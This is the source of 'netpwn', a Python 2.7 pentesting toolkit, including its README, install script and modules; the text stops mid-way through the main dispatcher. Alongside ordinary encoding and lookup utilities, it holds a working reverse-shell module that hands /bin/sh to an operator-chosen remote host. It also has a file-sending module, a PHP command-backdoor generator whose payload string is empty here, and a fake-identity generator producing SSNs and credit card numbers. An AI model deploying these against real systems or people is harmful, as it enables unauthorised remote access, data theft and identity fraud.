├── LICENSE
├── README.md
├── images
├── modules.png
├── netpwn.png
└── resources.png
├── install
├── modules
├── __init__.py
├── address.py
├── backdoor.py
├── base64_convert.py
├── cert.py
├── cmd.py
├── crypto.py
├── hasher.py
├── hex_convert.py
├── html.py
├── identity.py
├── no_endian.py
├── page.py
├── password.py
├── reverse.py
├── rot13.py
├── send.py
├── spider.py
├── url_coding.py
└── who.py
├── netpwn.py
└── resources
├── __init__.py
├── cheat_sheet.py
├── links.py
└── opcodes.py
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1 | # netpwn
2 | A framework made to automate tasks of pentesting.
3 | Written in python 2.7
4 |
5 | __Modules__
6 | reverse_shell - Creates a reverse shell with python to connect to a specific machine of your choice.
7 | send_file - Allows you to send a file to target server.
8 | php_backdoor - Generates a simple backdoor in php upload to web server ?cmd= to execute commands.
9 | hash_check - Paste a hash to see what type of hash it is.
10 | base64_converter - Paste base64 to decode or ascii to encode it knows which you want.
11 | address_info - Gives you your ipv4, ipv6, and public Ip address based upon a interface.
12 | hex_converter - Paste some ascii to encode or hex to decode it knows which you want.
13 | page_contents - Get the raw HTML of a given web page.
14 | password_checker - Check the strength of a given password.
15 | fake_identity - Creates a fake name with SSN, address, credit card number, etc.
16 | web_spider - Crawls a given URL for links.
17 | ssl_cert - Gets the cert information of a given web site and its public key.
18 | bash - Execute bash commands without exiting out of netpwn.
19 | whois - Performs whois on a given URL.
20 | crypto - Encrypts or decrypts a file with AES.
21 | no_endian - Removes endianness on DWORDS.
22 | rot13_converter - Encodes/decodes rot13.
23 | url_converter - Url encoded and decodes string.
24 | html_converter - Html enconded and decodes string.
25 |
26 | __Resources__
27 | cheat_sheet - Pentest monkey reverse shell cheat sheet
28 | opcodes - Prints out all x86 OpCodes.
29 | useful_links - Links to blogs, youtube channels, and other resources that
30 | offer good information about various topics that gives you the
31 | opportunity to learn more about the infosec field.
32 |
33 | __Usage__
34 | To run a specific module just type module name.
35 | For example to run php_backdoor the command should look like this.
36 | (netpwn) > php_backdoor
37 |
38 | __Features__
39 | AutoComplete - Type a few letters of the command you want and hit tab to for auto completion.
40 | clear - Type this to clear the screen.
41 | banner - Type this command to display the banner.
42 | help - Type this command to display help menu.
43 | modules - Type this command to list available modules.
44 | resources - Type this command to list available resources.
45 | exit or CTRL^C - Exits netpwn
46 |
47 | [
48 | [
49 | [
50 |
51 |
52 | ### Install
53 | #git clone https://github.com/3XPL017/netpwn.git; cd netpwn; chmod +x install; ./install
54 |
55 | ### Twitter
56 | https://twitter.com/3XPL017GH057
57 |
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1 | #!/bin/bash
2 | echo "Must be ran as root"
3 |
4 | sudo easy_install netifaces
5 | pip install faker
6 | pip install termcolor
7 | pip install python-whois
8 |
9 | echo "Finished installing"
10 | echo "Thanks for installing netpwn"
11 | echo "Run netpwn by typing the command netpwn"
12 |
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/modules/__init__.py:
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1 |
2 |
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/modules/address.py:
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1 | #!/usr/bin/python
2 | """address info module."""
3 |
4 | import fcntl
5 | import socket
6 | import struct
7 | from urllib2 import urlopen
8 |
9 | import netifaces
10 |
11 | from termcolor import colored
12 |
13 |
14 | def address_info():
15 | """Get networking information."""
16 | print colored('Enter interface', 'green')
17 | interface = raw_input(colored('(netpwn: address_info) > ', 'red'))
18 |
19 | try:
20 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
21 | val = struct.pack('256s', interface[:15])
22 | info = fcntl.ioctl(sock.fileno(), 0x8927, val)
23 | joining = ['%02x' % ord(char) for char in info[18:24]]
24 | print colored('Your MAC is: ' + ':'.join(joining), 'green')
25 |
26 | except IOError as error:
27 | print colored('Invalid interface ' + str(error), 'yellow')
28 |
29 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
30 | sock.connect(('8.8.8.8', 80))
31 | print colored('Your ipv4 is : ' + (sock.getsockname()[0]), 'green')
32 | sock.close()
33 |
34 | try:
35 | addrs = netifaces.ifaddresses(interface)
36 | address6 = addrs[netifaces.AF_INET6][0]['addr']
37 | address6_1 = addrs[netifaces.AF_INET6][1]['addr']
38 | address6_2 = addrs[netifaces.AF_INET6][2]['addr']
39 | print colored('Your ipv6 is: ' + address6, 'green')
40 | print colored('Your ipv6 is: ' + address6_1, 'green')
41 | print colored('Your ipv6 is: ' + address6_2, 'green')
42 |
43 | except ValueError as error:
44 | print colored('Invalid interface ' + str(error), 'yellow')
45 |
46 | my_gateway = netifaces.gateways()
47 | getgateway = my_gateway['default'][socket.AF_INET][0]
48 | print colored('Your default gateway is: ' + getgateway, 'green')
49 | my_ip = urlopen('http://ipinfo.io/ip').read()
50 | print colored('Your public IP is: ' + my_ip, 'green')
51 |
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/modules/backdoor.py:
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1 | #!/usr/bin/python
2 | """backdoor module."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def php_backdoor():
8 | """Create a backdoor in php."""
9 | print colored('Creating backdoor.php', 'green')
10 | print colored('Usage: http:///backdoor.php?cmd=', 'green')
11 | code = " "
12 | backdoor = open('backdoor.php', 'w')
13 | backdoor.write(code)
14 | backdoor.close()
15 |
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/modules/base64_convert.py:
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1 | #!/usr/bin/python
2 | """Base64 module."""
3 |
4 | import base64
5 |
6 | from termcolor import colored
7 |
8 |
9 | def base64_converter():
10 | """Convert to and from base64."""
11 | print colored('Enter some text to encode or decode as base64', 'green')
12 | print colored('This will automatically try to encode or decode', 'green')
13 | input_str = raw_input(colored('(netpwn: base64_converter) > ', 'red'))
14 |
15 | try:
16 | output = base64.b64decode(input_str)
17 | output.encode('ascii')
18 |
19 | except TypeError:
20 | output = base64.b64encode(input_str)
21 |
22 | print colored(output, 'green')
23 |
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/modules/cert.py:
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1 | #!/usr/bin/python
2 | """ssl module."""
3 |
4 | import socket
5 | import ssl
6 |
7 | from termcolor import colored
8 |
9 |
10 | def ssl_cert():
11 | """Get the ssl cert of a website."""
12 | print colored('Enter a URL to get its SSL cert', 'green')
13 | target_url = raw_input(colored('(netpwn: ssl_cert) > ', 'red'))
14 |
15 | try:
16 | cert = ssl.get_server_certificate((target_url, 443))
17 | ctx = ssl.create_default_context()
18 | socks = socket.socket()
19 | sock = ctx.wrap_socket(socks, server_hostname=target_url)
20 | sock.connect((target_url, 443))
21 | certs = sock.getpeercert()
22 | subject = dict(x[0] for x in certs['subject'])
23 | country = subject['countryName']
24 | issued_to = subject['commonName']
25 | organization = subject['organizationName']
26 | location = subject['stateOrProvinceName']
27 | issuer = dict(x[0] for x in certs['issuer'])
28 | issued_by = issuer['commonName']
29 | print colored(cert, 'green')
30 | print colored('Country: ' + country, 'green')
31 | print colored('Issued to: ' + issued_to, 'green')
32 | print colored('Organization: ' + organization, 'green')
33 | print colored('Province: ' + location, 'green')
34 | print colored('Issued by: ' + issued_by, 'green')
35 | print ' '
36 |
37 | except socket.error:
38 | print colored('Unknown host: ' + target_url, 'yellow')
39 |
40 | except KeyError:
41 | print colored('No SSL cert', 'yellow')
42 |
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/modules/cmd.py:
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1 | #!/usr/bin/python
2 | """bash module."""
3 |
4 | import os
5 |
6 | from termcolor import colored
7 |
8 |
9 | def bash():
10 | """Run bash."""
11 | print colored('Type [back] to return to netpwn', 'green')
12 |
13 | while True:
14 | command = raw_input(colored('(netpwn: bash) > ', 'red'))
15 |
16 | if command == 'back':
17 | break
18 |
19 | else:
20 | os.system(command)
21 |
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/modules/crypto.py:
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1 | #!/usr/bin/python
2 | """Encrypt and decrypt files."""
3 |
4 | import os
5 |
6 | from Crypto.Cipher import AES
7 | from Crypto.Hash import HMAC
8 | from Crypto.Protocol.KDF import PBKDF2
9 |
10 | from termcolor import colored
11 |
12 |
13 | def crypt():
14 | """Encrypt and decrypt a file."""
15 | print colored('Enter 1 to encrypt 2 to decrypt', 'green')
16 | choice = raw_input(colored('(netpwn: crypto) > ', 'red'))
17 |
18 | if not (choice == '1' or choice == '2'):
19 | print colored('Not a valid choice', 'yellow')
20 | return
21 |
22 | print colored('Enter your input file', 'green')
23 | file = raw_input(colored('(netpwn: crypto) > ', 'red'))
24 | print colored('Enter a password to encrypt or decrypt with', 'green')
25 |
26 | key = raw_input(colored('(netpwn: crypto) > ', 'red'))
27 |
28 | try:
29 | inputfile = open(file, 'rb')
30 | except IOError:
31 | print colored('Could not open file', 'yellow')
32 | return
33 |
34 | salt = "data"
35 | kdf = PBKDF2(key, salt, 64, 1000)
36 | key = kdf[:32]
37 | key_mac = kdf[32:]
38 | mac = HMAC.new(key_mac)
39 |
40 | if choice == '1':
41 | try:
42 | print colored('Saving as encrypted.txt', 'green')
43 | output = open('encrypted.txt', 'wb')
44 | except IOError:
45 | print colored('Could not create the output file', 'yellow')
46 | return
47 |
48 | iv = os.urandom(16)
49 | cipher = AES.new(key, AES.MODE_CFB, iv)
50 | encrypted = cipher.encrypt(inputfile.read())
51 | mac.update(iv + encrypted)
52 | output.write(mac.hexdigest())
53 | output.write(iv)
54 | output.write(encrypted)
55 | print colored(encrypted, 'green')
56 |
57 | elif choice == '2':
58 | try:
59 | print colored('Saving as decrypted.txt', 'green')
60 | output = open('decrypted.txt', 'wb')
61 | except IOError:
62 | print colored('Could not create the output file', 'yellow')
63 | return
64 |
65 | data = inputfile.read()
66 | verify = data[0:32]
67 | mac.update(data[32:])
68 |
69 | if mac.hexdigest() != verify:
70 | print colored('Wrong password', 'yellow')
71 |
72 | iv = data[32:48]
73 | cipher = AES.new(key, AES.MODE_CFB, iv)
74 | decrypted = cipher.decrypt(data[48:])
75 | output.write(decrypted)
76 | print colored(decrypted, 'green')
77 |
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/modules/hasher.py:
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1 | #!/usr/bin/python
2 | """hash check module."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def hash_check():
8 | """Detect input hash type."""
9 | print colored('Enter a hash to determine its type', 'green')
10 | input_hash = raw_input(colored('(netwn: hash_check) > ', 'red'))
11 |
12 | if len(input_hash) == 32:
13 | print colored('Hash type: md5', 'green')
14 |
15 | elif len(input_hash) == 40:
16 | print colored('Hash type: sha1', 'green')
17 |
18 | elif len(input_hash) == 64:
19 | print colored('Hash type: sha256', 'green')
20 |
21 | elif len(input_hash) == 128:
22 | print colored('Hash type: sha512', 'green')
23 |
24 | else:
25 | print colored('No hash type found', 'green')
26 |
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/modules/hex_convert.py:
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1 | #!/usr/bin/python
2 | """hex converter module."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def hex_converter():
8 | """Convert to and from hexadecimal."""
9 | print colored('This converts hex to ascii and ascii to hex')
10 | input_str = raw_input(colored('(netpwn: hex_converter) > ', 'red'))
11 | decoded = input_str
12 | encoded = input_str
13 |
14 | try:
15 | if any(i in decoded for i in '0x'):
16 | decoded = decoded.replace('0x', '')
17 |
18 | if any(i in decoded for i in '\\x'):
19 | decoded = decoded.replace('\\x', '')
20 |
21 | decoded = decoded.decode('hex')
22 | print colored('Decoded as: ' + decoded, 'green')
23 |
24 | except TypeError:
25 | print colored('No hex value was given to decode', 'yellow')
26 |
27 | encoded = encoded.encode('hex')
28 | print colored('Encoded as: ' + '0x' + encoded)
29 |
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1 | #!/usr/bin/python
2 | """Html Convert."""
3 |
4 | import HTMLParser
5 | import cgi
6 |
7 | from termcolor import colored
8 |
9 |
10 | def convert():
11 | """Escape and unescape html characters."""
12 | print colored('Enter a string to html encode or decode', 'green')
13 | input_str = raw_input(colored('(netpwn: html_converter) > ', 'red'))
14 | encoded = cgi.escape(input_str)
15 | decoded = HTMLParser.HTMLParser().unescape(input_str)
16 | print colored('Encoded: ' + encoded, 'green')
17 | print colored('Decoded: ' + decoded, 'green')
18 |
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/modules/identity.py:
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1 | #!/usr/bin/python
2 | """fake identity module."""
3 |
4 | import random
5 |
6 | from faker import Faker
7 |
8 | from termcolor import colored
9 |
10 |
11 | def race_selection():
12 | """Choose race."""
13 | fake = Faker()
14 | print colored('Name: ' + fake.name(), 'green')
15 | race_picker = random.randint(0, 5)
16 |
17 | race = {
18 | 0: 'Caucasian',
19 | 1: 'African-American',
20 | 2: 'Mexican',
21 | 3: 'Indian',
22 | 4: 'Asian',
23 | 5: 'Native American'
24 | }
25 |
26 | race_type = race.get(race_picker)
27 | print colored('Race: ' + race_type, 'green')
28 |
29 |
30 | def height_selection():
31 | """Choose height."""
32 | feet = 5
33 | inches = random.randint(1, 11)
34 | height = str(feet) + "'" + str(inches) + '"'
35 | print colored('Height: ' + height, 'green')
36 |
37 |
38 | def weight_selection():
39 | """Choose weight."""
40 | pounds = random.randint(120, 300)
41 | sub_pounds = random.randint(0, 9)
42 | weight = str(pounds) + '.' + str(sub_pounds)
43 | print colored('Weight: ' + weight, 'green')
44 |
45 |
46 | def blood_selection():
47 | """Choose blood type."""
48 | blood_picker = random.randint(0, 7)
49 |
50 | blood = {
51 | 0: 'A+',
52 | 1: 'A-',
53 | 2: 'B+',
54 | 3: 'B-',
55 | 4: 'AB+',
56 | 5: 'AB-',
57 | 6: 'O+',
58 | 7: 'O-'
59 | }
60 |
61 | blood_type = blood.get(blood_picker)
62 | print colored('Blood type: ' + blood_type, 'green')
63 |
64 |
65 | def ssn_selection():
66 | """Choose SSN."""
67 | first_ssn = random.randint(100, 999)
68 | second_snn = random.randint(10, 99)
69 | third_ssn = random.randint(1000, 9999)
70 | social = (str(first_ssn) + '-' +
71 | str(second_snn) + '-' +
72 | str(third_ssn))
73 |
74 | print colored('SSN: ' + social, 'green')
75 |
76 |
77 | def number_selection():
78 | """Choose number."""
79 | first_num = random.randint(100, 999)
80 | second_num = random.randint(100, 999)
81 | third_num = random.randint(1000, 9999)
82 | phone_number = ('(' + str(first_num) + ')' +
83 | str(second_num) + '-' +
84 | str(third_num))
85 |
86 | print colored('Phone number: ' + phone_number, 'green')
87 |
88 |
89 | def month_selection():
90 | """Choose DOB."""
91 | month_picker = random.randint(0, 11)
92 | yold = random.randint(18, 80)
93 | year = 2018 - yold
94 | day = random.randint(1, 28)
95 |
96 | month = {
97 | 0: 'Jan',
98 | 1: 'Feb',
99 | 2: 'Mar',
100 | 3: 'Apr',
101 | 4: 'May',
102 | 5: 'Jun',
103 | 6: 'Jul',
104 | 7: 'Aug',
105 | 8: 'Sep',
106 | 9: 'Oct',
107 | 10: 'Nov',
108 | 11: 'Dec'
109 | }
110 |
111 | exact_month = month.get(month_picker)
112 | date = exact_month + ' ' + str(day) + ' ' + str(year)
113 | print colored('DOB: ' + date, 'green')
114 |
115 |
116 | def address_selection():
117 | """Choose address."""
118 | fake = Faker()
119 | address = fake.address()
120 | print colored('Address: ' + address, 'green')
121 |
122 |
123 | def job_selection():
124 | """Choose job."""
125 | job_picker = random.randint(0, 19)
126 |
127 | jobs = {
128 | 0: 'Teacher Assistant',
129 | 1: 'Urban Planner',
130 | 2: 'Painter',
131 | 3: 'Zoologist',
132 | 4: 'Musician',
133 | 5: 'Interpreter & Translator',
134 | 6: 'Marketing Manager',
135 | 7: 'Loan Officer',
136 | 8: 'Microbiologist',
137 | 9: 'Customer Service Representative',
138 | 10: 'Computer Programmer',
139 | 11: 'High School Teacher',
140 | 12: 'Substance Abuse Counselor',
141 | 13: 'Mechanical Engineer',
142 | 14: 'Drafter',
143 | 15: 'Preschool Teacher',
144 | 16: 'Environmental scientist',
145 | 17: 'Automotive mechanic',
146 | 18: 'Insurance Agent',
147 | 19: 'Veterinarian'
148 | }
149 |
150 | job = jobs.get(job_picker)
151 | print colored('Occupation: ' + job, 'green')
152 |
153 |
154 | def email_selection():
155 | """Choose email."""
156 | email_picker = random.randint(0, 19)
157 |
158 | email = {
159 | 0: 'leviathan@comcast.net',
160 | 1: 'sportsfan@comcast.net',
161 | 2: 'heroine@yahoo.ca',
162 | 3: 'jigsaw@gmail.com',
163 | 4: 'moonlapse@optonline.net',
164 | 5: 'ninenine@outlook.com',
165 | 6: 'warrior@aol.com',
166 | 7: 'crimsane@yahoo.ca',
167 | 8: 'world@comcast.net',
168 | 9: 'singer@verizon.net',
169 | 10: 'sumdumass@att.net',
170 | 11: 'payned@yahoo.com',
171 | 12: 'shrapnull@comcast.net',
172 | 13: 'curly@optonline.net',
173 | 14: 'mschilli@comcast.net',
174 | 15: 'empathy@sbcglobal.net',
175 | 16: 'codex@optonline.net',
176 | 17: 'ehood@yahoo.com',
177 | 18: 'nacho@outlook.com',
178 | 19: 'crusader@icloud.com'
179 | }
180 |
181 | exact_email = email.get(email_picker)
182 | print colored('Email: ' + exact_email, 'green')
183 |
184 |
185 | def credit_selection():
186 | """Choose SSN."""
187 | type_picker = random.randint(0, 3)
188 | first_num = random.randint(1000, 9999)
189 | second_num = random.randint(1000, 9999)
190 | third_num = random.randint(1000, 9999)
191 | forth_num = random.randint(1000, 9999)
192 | cvv_picker = random.randint(100, 999)
193 | credit_number = (str(first_num) + ' ' +
194 | str(second_num) + ' ' +
195 | str(third_num) + ' ' +
196 | str(forth_num))
197 |
198 | credit_type = {
199 | 0: 'Visa',
200 | 1: 'MasterCard',
201 | 2: 'Discover',
202 | 3: 'American Express'
203 | }
204 |
205 | first_date = random.randint(1, 12)
206 | second_date = random.randint(18, 22)
207 | credit_date = (str(first_date) + '/' +
208 | str(second_date))
209 |
210 | get_type = credit_type.get(type_picker)
211 | print colored('Credit card: ', 'green')
212 | print colored(get_type, 'green')
213 | print colored(credit_number, 'green')
214 | print colored(cvv_picker, 'green')
215 | print colored(credit_date, 'green')
216 |
217 |
218 | def color_selection():
219 | """Choose favorite color."""
220 | color_picker = random.randint(0, 9)
221 |
222 | color = {
223 | 0: 'blue',
224 | 1: 'green',
225 | 2: 'red',
226 | 3: 'orange',
227 | 4: 'yellow',
228 | 5: 'purple',
229 | 6: 'pink',
230 | 7: 'black',
231 | 8: 'white',
232 | 9: 'gray'
233 | }
234 |
235 | fav_color = color.get(color_picker)
236 | print colored('Favorite color: ' + fav_color, 'green')
237 |
238 |
239 | def fake_identity():
240 | """Generate a fake identity."""
241 | race_selection()
242 | height_selection()
243 | weight_selection()
244 | blood_selection()
245 | ssn_selection()
246 | number_selection()
247 | address_selection()
248 | job_selection()
249 | email_selection()
250 | credit_selection()
251 | color_selection()
252 |
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/modules/no_endian.py:
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1 | #!/usr/bin/python
2 | """No endian."""
3 |
4 | from termcolor import colored
5 |
6 |
7 | def no_little():
8 | """Remove little endian."""
9 | print colored('Enter a DWORD(4 bytes) of hex data', 'green')
10 | input_str = raw_input(colored('(netpwn: no_endian) > ', 'red'))
11 | dword = input_str.strip('0x')
12 | byte = dword[6:8]
13 | byte1 = dword[4:6]
14 | byte2 = dword[2:4]
15 | byte3 = dword[0:2]
16 | new_dword = byte + byte1 + byte2 + byte3
17 |
18 | try:
19 | print colored("New DWORD: 0x" + new_dword, 'green')
20 | print colored(new_dword.decode('hex'), 'green')
21 |
22 | except TypeError:
23 | print colored('Please enter a DWORD', 'yellow')
24 |
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/modules/page.py:
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1 | #!/usr/bin/python
2 | """get page contents module."""
3 |
4 | from urllib2 import urlopen
5 |
6 | from termcolor import colored
7 |
8 |
9 | def page_contents():
10 | """Show contents of a web page."""
11 | try:
12 | print colored('Enter URL', 'green')
13 | target_url = raw_input(colored('(netpwn: page_contents) > ', 'red'))
14 | contents = urlopen(target_url).read()
15 | save = raw_input(colored('Save to file: ', 'green'))
16 |
17 | if save == 'yes' or save == 'y':
18 | print colored('Saved to page.txt', 'green')
19 | save_file = open('page.txt', 'w')
20 | save_file.write(contents)
21 |
22 | else:
23 | print colored(contents, 'green')
24 |
25 | except ValueError as error:
26 | print colored('Not a valid URL ' + str(error), 'yellow')
27 |
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/modules/password.py:
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1 | #!/usr/bin/python
2 | """password checking module."""
3 |
4 | import re
5 |
6 | from termcolor import colored
7 |
8 |
9 | def password_checker():
10 | """Check password strength."""
11 | print colored('Enter a password to check', 'green')
12 | password = raw_input(colored('(netpwn: password_checker) > ', 'red'))
13 | length = len(password)
14 |
15 | if length < 12:
16 | print colored('Your password is too short ', 'yellow')
17 |
18 | else:
19 | print colored('Good password length', 'green')
20 |
21 | if password.isupper() is False and password.islower() is False:
22 | print colored('Good password case mixture', 'green')
23 |
24 | else:
25 | print colored('Bad password case mixture', 'yellow')
26 |
27 | if re.match('^[a-zA-Z0-9_]*$', password):
28 | print colored('Does not contain special chararacters', 'yellow')
29 |
30 | else:
31 | print colored('Does contain special chararacters', 'green')
32 |
33 | def check_for_nums(password):
34 | """Check password for numbers."""
35 | return any(i.isdigit() for i in password)
36 |
37 | if check_for_nums(password) is False:
38 | print colored('Your password does not contain any numbers', 'yellow')
39 |
40 | else:
41 | print colored('Your password contains numbers', 'green')
42 |
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/modules/reverse.py:
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1 | #!/usr/bin/python
2 | """Reverse shell module."""
3 |
4 | import os
5 | import socket
6 | import subprocess
7 |
8 | from termcolor import colored
9 |
10 |
11 | def reverse_shell():
12 | """Create a reverse shell using /bin/sh."""
13 | try:
14 | print colored('Enter the IP to connect to', 'green')
15 | tgt_host = raw_input(colored('(netpwn: reverse_shell) > ', 'red'))
16 | print colored('Enter the port to connect to', 'green')
17 | tgt_port = int(raw_input(colored('(netpwn: reverse_shell) > ', 'red')))
18 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19 | sock.connect((tgt_host, tgt_port))
20 | os.dup2(sock.fileno(), 0)
21 | os.dup2(sock.fileno(), 1)
22 | os.dup2(sock.fileno(), 2)
23 | subprocess.call(["/bin/sh", "-i"])
24 | sock.shutdown(socket.SHUT_RDWR)
25 | sock.close()
26 |
27 | except socket.error:
28 | print colored('Could not connect to host', 'yellow')
29 |
30 | except ValueError:
31 | print colored('Not a valid IP or port', 'yellow')
32 |
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/modules/rot13.py:
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1 | #!/usr/bin/python
2 | """Rot13."""
3 |
4 | import codecs
5 |
6 | from termcolor import colored
7 |
8 |
9 | def convert():
10 | """Convert to or from Rot13."""
11 | print colored('Enter text to encode or decode as rot13', 'green')
12 | input_str = raw_input(colored('(netpwn: rot13_converter) > ', 'red'))
13 | output = codecs.encode(input_str, 'rot_13')
14 | print colored(output, 'green')
15 |
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/modules/send.py:
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1 | #!/usr/bin/python
2 | """send module."""
3 |
4 | import socket
5 |
6 | from termcolor import colored
7 |
8 |
9 | def send_file():
10 | """Send file to remote location."""
11 | try:
12 | print colored('Enter the IP to send file to', 'green')
13 | address = raw_input(colored('(netpwn: send_file) > ', 'red'))
14 | print colored('Enter the port to send file to', 'green')
15 | port = int(raw_input(colored('(netpwn: send_file) > ', 'red')))
16 | print colored('Enter directory of file to send', 'green')
17 | input_file = raw_input(colored('(netpwn: send_file) > ', 'red'))
18 | open_file = open(input_file)
19 | send = open_file.read()
20 | transfer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
21 | transfer.connect((address, port))
22 | transfer.send(send)
23 |
24 | except ValueError as error:
25 | print colored('Could not send file to ' + str(error), 'yellow')
26 |
27 | except IOError as error:
28 | print colored('Could not find ' + str(error), 'yellow')
29 |
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/modules/spider.py:
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1 | #!/usr/bin/python
2 | """spider module."""
3 |
4 | import re
5 | from urllib2 import urlopen
6 |
7 | from termcolor import colored
8 |
9 |
10 | def web_spider():
11 | """Web spider."""
12 | try:
13 | print colored('Enter a URL to crawl', 'green')
14 | target_url = raw_input(colored('(netpwn: web_spider) > ', 'red'))
15 | pattern = '''href=["'](.[^"']+)["']'''
16 |
17 | for urls in re.findall(pattern, urlopen(target_url).read(), re.I):
18 | print colored(urls, 'green')
19 |
20 | except ValueError:
21 | print colored('Cannot crawl URL', 'yellow')
22 |
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/modules/url_coding.py:
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1 | #!/usr/bin/python
2 | """URL encode and decode."""
3 |
4 | import urllib
5 |
6 | from termcolor import colored
7 |
8 |
9 | def converting():
10 | """Convert to and from."""
11 | print colored('Enter a string to encode or decode', 'green')
12 | input_str = raw_input(colored('(netpwn: url_converter) > ', 'red'))
13 | encode = urllib.quote_plus(input_str).encode('utf8')
14 | decode = urllib.unquote(input_str).decode('utf8')
15 | print colored('Encoded: ' + encode, 'green')
16 | print colored('Decoded: ' + decode, 'green')
17 |
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/modules/who.py:
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1 | #!/usr/bin/python
2 | """whois module."""
3 |
4 | from termcolor import colored
5 |
6 | from whois import whois
7 |
8 |
9 | def whois_lookup():
10 | """Perform whois."""
11 | try:
12 | print colored('Enter a URL to get whois data', 'green')
13 | domain = raw_input(colored('(netpwn: whois) > ', 'red'))
14 | target = [domain]
15 | targets = whois(target[0])
16 | print colored('name: ' + targets['name'], 'green')
17 | print colored('city: ' + targets['city'], 'green')
18 | print colored('zipcode: ' + targets['zipcode'], 'green')
19 | print colored('country: ' + targets['country'], 'green')
20 | print colored('state: ' + targets['state'], 'green')
21 | print colored('registrar: ' + targets['registrar'], 'green')
22 | print colored('address : ' + targets['address'], 'green')
23 | print colored('org : ' + targets['org'], 'green')
24 |
25 | for domains in targets['domain_name']:
26 | print colored('DNS: ' + domains, 'green')
27 |
28 | for emails in targets['emails']:
29 | print colored('emails : ' + emails, 'green')
30 |
31 | except TypeError:
32 | print colored('Cannot retrieve information', 'red')
33 |
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/netpwn.py:
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1 | #!/usr/bin/python
2 | """netpwn pentesting tool."""
3 | # Created by 3XPL017
4 | # Member of @togetherwehack
5 |
6 | import os
7 | import readline
8 | import sys
9 |
10 | from modules import address
11 | from modules import backdoor
12 | from modules import base64_convert
13 | from modules import cert
14 | from modules import cmd
15 | from modules import crypto
16 | from modules import hasher
17 | from modules import hex_convert
18 | from modules import html
19 | from modules import identity
20 | from modules import no_endian
21 | from modules import page
22 | from modules import password
23 | from modules import reverse
24 | from modules import rot13
25 | from modules import send
26 | from modules import spider
27 | from modules import url_coding
28 | from modules import who
29 |
30 | from resources import cheat_sheet
31 | from resources import links
32 | from resources import opcodes
33 |
34 | from termcolor import colored
35 |
36 |
37 | OPTIONS_SL = [
38 | 'reverse_shell',
39 | 'send_file',
40 | 'php_backdoor',
41 | 'hash_check',
42 | 'base64_converter',
43 | 'address_info',
44 | 'hex_converter',
45 | 'page_contents',
46 | 'password_checker',
47 | 'fake_identity',
48 | 'web_spider',
49 | 'ssl_cert',
50 | 'bash',
51 | 'whois',
52 | 'crypto',
53 | 'no_endian',
54 | 'rot13_converter',
55 | 'url_converter',
56 | 'html_converter',
57 | 'cheat_sheet',
58 | 'useful_links',
59 | 'opcodes',
60 | 'help',
61 | 'resources',
62 | 'modules'
63 | ]
64 |
65 | TABCOMP = OPTIONS_SL
66 |
67 |
68 | def completer(text, state):
69 | """Tab complete."""
70 | options = [x for x in TABCOMP if x.startswith(text)]
71 |
72 | try:
73 | return options[state]
74 |
75 | except IndexError:
76 | return None
77 |
78 |
79 | readline.set_completer(completer)
80 | readline.parse_and_bind("tab: complete")
81 |
82 |
83 | def check_root():
84 | """Check for root privileges."""
85 | if not os.geteuid() == 0 and not os.getgid() == 0:
86 | return False
87 |
88 |
89 | def banner():
90 | """Display the netpwn banner."""
91 | print colored(r' __ ', 'blue',)
92 | print colored(r' ____ _____/ |_________ _ ______ ', 'blue')
93 | print colored(r' / \_/ __ \ __\____ \ \/ \/ / \ ', 'blue')
94 | print colored(r'| | \ ___/| | | |_> > / | \ ', 'blue')
95 | print colored(r'|___| /\___ >__| | __/ \/\_/|___| /', 'blue')
96 | print colored(r' \/ \/ |__| \/ ', 'blue')
97 | print ' '
98 | print colored(r' | Created by 3XPL017 |', 'blue')
99 | print colored(r' | twitter: @3XPL017GH057 |', 'blue')
100 | print colored(r' | https://github.com/3XPL017 |', 'blue')
101 | print '\n' * 11
102 |
103 |
104 | def modules():
105 | """Print available modules."""
106 | print ' '
107 | print colored('Modules', 'green')
108 | print colored('===================', 'green')
109 | print colored('reverse_shell', 'green')
110 | print colored('send_file', 'green')
111 | print colored('php_backdoor', 'green')
112 | print colored('hash_check', 'green')
113 | print colored('base64_converter', 'green')
114 | print colored('address_info', 'green')
115 | print colored('hex_converter', 'green')
116 | print colored('page_contents', 'green')
117 | print colored('password_checker', 'green')
118 | print colored('fake_identity', 'green')
119 | print colored('web_spider', 'green')
120 | print colored('ssl_cert', 'green')
121 | print colored('bash', 'green')
122 | print colored('whois', 'green')
123 | print colored('crypto', 'green')
124 | print colored('no_endian', 'green')
125 | print colored('rot13_converter', 'green')
126 | print colored('url_converter', 'green')
127 | print colored('html_converter', 'green')
128 | print ' '
129 |
130 |
131 | def list_resources():
132 | """List resource types."""
133 | print ''
134 | print colored('Resources', 'green')
135 | print colored('=============', 'green')
136 | print colored('useful_links', 'green')
137 | print colored('cheat_sheet', 'green')
138 | print colored('opcodes', 'green')
139 | print ''
140 |
141 |
142 | def help_menu():
143 | """Print help menu."""
144 | print ' '
145 | print colored('Commands', 'green')
146 | print colored(
147 | '==================================================',
148 | 'green')
149 | print colored(
150 | '[module name] runs the selected module', 'green')
151 | print colored(
152 | '[resource name] lists the selected resource', 'green')
153 | print colored(
154 | 'modules lists available modules', 'green')
155 | print colored(
156 | 'resources lists types of resources to list', 'green')
157 | print colored(
158 | 'banner displays the banner', 'green')
159 | print colored(
160 | 'clear clears the screen', 'green')
161 | print colored(
162 | 'exit exits netpwn', 'green')
163 | print ' '
164 |
165 |
166 | def main():
167 | """Handle which function to run."""
168 | if check_root() is False:
169 | sys.exit(colored('netpwn must be run as root', 'yellow'))
170 |
171 | choice = raw_input(colored('(netpwn) > ', 'red'))
172 |
173 | options = {
174 | 'reverse_shell': reverse.reverse_shell,
175 | 'send_file': send.send_file,
176 | 'php_backdoor': backdoor.php_backdoor,
177 | 'hash_check': hasher.hash_check,
178 | 'base64_converter': base64_convert.base64_converter,
179 | 'address_info': address.address_info,
180 | 'hex_converter': hex_convert.hex_converter,
181 | 'page_contents': page.page_contents,
182 | 'password_checker': password.password_checker,
183 | 'fake_identity': identity.fake_identity,
184 | 'web_spider': spider.web_spider,
185 | 'ssl_cert': cert.ssl_cert,
186 | 'bash': cmd.bash,
187 | 'whois': who.whois_lookup,
188 | 'cheat_sheet': cheat_sheet.reverse_shells,
189 | 'crypto': crypto.crypt,
190 | 'no_endian': no_endian.no_little,
